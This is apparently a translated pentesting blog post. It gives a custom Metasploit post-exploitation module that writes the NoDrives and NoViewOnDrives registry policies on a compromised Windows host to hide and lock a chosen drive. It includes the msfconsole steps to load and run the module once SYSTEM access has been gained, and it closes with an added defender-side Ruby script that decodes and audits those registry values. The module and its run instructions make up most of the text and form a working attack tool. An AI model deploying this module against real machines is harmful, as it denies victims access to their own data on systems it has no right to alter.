A program that disables a specified drive on a Windows operating system; here we name the script disable_drives_by_binghe.rb.

Its full content is as follows:

##
# Author: 冰河 (binghe)
# Date: 2019-01-12
# Description: hides and restricts access to a specified drive on a Windows host
#              via the Explorer policy values NoDrives and NoViewOnDrives
##

# Current framework versions name the module class MetasploitModule and no
# longer need `require 'msf/core'`; the old Metasploit3 name is obsolete.
class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'         => 'Drive Disabler',
        'Description'  => 'This module hides and restricts access to a drive',
        'Author'       => 'binghe',
        'License'      => MSF_LICENSE,
        'Platform'     => ['win'],
        'SessionTypes' => ['meterpreter']
      )
    )
    # The option is named DriverName here and in the console transcript below;
    # the original code read datastore['DriveName'], which never matched.
    register_options(
      [
        OptString.new('DriverName', [true, 'Please SET the Drive Letter'])
      ]
    )
  end

  def run
    drive_int = drive_string(datastore['DriverName'])
    fail_with(Failure::BadConfig, 'DriverName must be a single letter A-Z') if drive_int.nil?

    key1 = 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer'
    # Writing a value under a missing key fails, so create the policy key first.
    unless meterpreter_registry_key_exist?(key1)
      print_status('Policy key does not exist, creating it')
      meterpreter_registry_createkey(key1, REGISTRY_VIEW_NATIVE)
    end

    # Both values are written as REG_DWORD bitmasks; this overwrites any mask
    # already present, exactly as the original module did.
    print_good('Hiding Drive')
    meterpreter_registry_setvaldata(key1, 'NoDrives', drive_int.to_s, 'REG_DWORD', REGISTRY_VIEW_NATIVE)
    print_good('Restricting Access to the Drive')
    meterpreter_registry_setvaldata(key1, 'NoViewOnDrives', drive_int.to_s, 'REG_DWORD', REGISTRY_VIEW_NATIVE)
    print_good("Disabled #{datastore['DriverName']} Drive")
  end

  # NoDrives / NoViewOnDrives encode drives as a bitmask: bit 0 = A:, bit 1 = B:,
  # ... bit 25 = Z: (so A=1, B=2, C=4, D=8, E=16, as the original case table had).
  # Returns nil for anything that is not a single letter.
  def drive_string(drive)
    return nil unless drive.to_s =~ /\A[A-Za-z]\z/
    1 << (drive.upcase.ord - 'A'.ord)
  end
end

Note: the prerequisite for using this script is that we have already obtained System privileges on the target Windows server through a preceding series of penetration steps.

Next, we upload the script to the /usr/share/metasploit-framework/modules/post/windows/manage directory on Kali, and then run the following on Kali:

msfconsole
msf auxiliary(scanner/ssh/ssh_brute_by_binghe) > use post/windows/manage/disable_drives_by_binghe
msf post(windows/manage/disable_drives_by_binghe) > show options

Module options (post/windows/manage/disable_drives_by_binghe):

Name Current Setting Required Description
---- --------------- -------- -----------
DriverName yes Please SET the Drive Letter
SESSION yes The session to run this module on.

msf post(windows/manage/disable_drives_by_binghe) > set DriverName D
DriverName => D
msf post(windows/manage/disable_drives_by_binghe) > run

At this point, checking the target server shows that the D drive has indeed been disabled. Both values are Explorer shell policies: NoDrives only hides the drive letter from Explorer, while NoViewOnDrives blocks access to it through Explorer; deleting the two values from the same key reverses the change, and the change takes effect for Explorer once it re-reads the policy (for example after a log-off).
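As an added, defender-side example (not part of the original post or of the module above): a Ruby helper that decodes the NoDrives/NoViewOnDrives bitmask back into drive letters and audits a `reg query` dump of the policy key, so the change can be verified or detected from the registry; the `reg query` text embedded below is a constructed sample.

```ruby
# Added example (not from the original post): audit the Explorer drive policy.
# NoDrives / NoViewOnDrives are 26-bit masks: bit 0 = A:, bit 1 = B:, ..., bit 25 = Z:.
DRIVE_POLICY_VALUES = %w[NoDrives NoViewOnDrives].freeze
ALL_DRIVES_MASK = 0x03FFFFFF # every bit A..Z set

# Encode drive letters into the mask (the same encoding the module writes).
def mask_from_drives(letters)
  letters.map { |l| 1 << (l.upcase.ord - 'A'.ord) }.reduce(0, :|)
end

# Decode a mask back into drive letters, e.g. 8 => ["D:"].
def drives_from_mask(mask)
  ('A'..'Z').each_with_index.select { |_, i| mask[i] == 1 }.map { |l, _| "#{l}:" }
end

# Parse `reg query HKLM\...\Policies\Explorer` text; value lines look like
# "    NoDrives    REG_DWORD    0x8". Returns {'NoDrives' => 8, ...}.
def parse_reg_query(output)
  output.each_line.with_object({}) do |line, h|
    name, type, data = line.strip.split(/\s+/, 3)
    next unless DRIVE_POLICY_VALUES.include?(name) && type == 'REG_DWORD'
    h[name] = Integer(data) # Integer('0x8') => 8
  end
end

# Report which drives each policy value affects, plus drives that are hidden
# (NoDrives) but still reachable in Explorer because NoViewOnDrives omits them.
def audit_drive_policy(output)
  masks = parse_reg_query(output)
  report = masks.transform_values { |m| drives_from_mask(m) }
  hidden_only = masks.fetch('NoDrives', 0) & ~masks.fetch('NoViewOnDrives', 0)
  report['hidden_but_accessible'] = drives_from_mask(hidden_only)
  report
end

# Constructed sample of `reg query` output after the module ran with DriverName=D.
SAMPLE_REG_QUERY = <<~'REG'
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
      NoDrives            REG_DWORD    0x8
      NoViewOnDrives      REG_DWORD    0x8
      NoDriveTypeAutoRun  REG_DWORD    0xff
REG

puts audit_drive_policy(SAMPLE_REG_QUERY).inspect if $PROGRAM_NAME == __FILE__
```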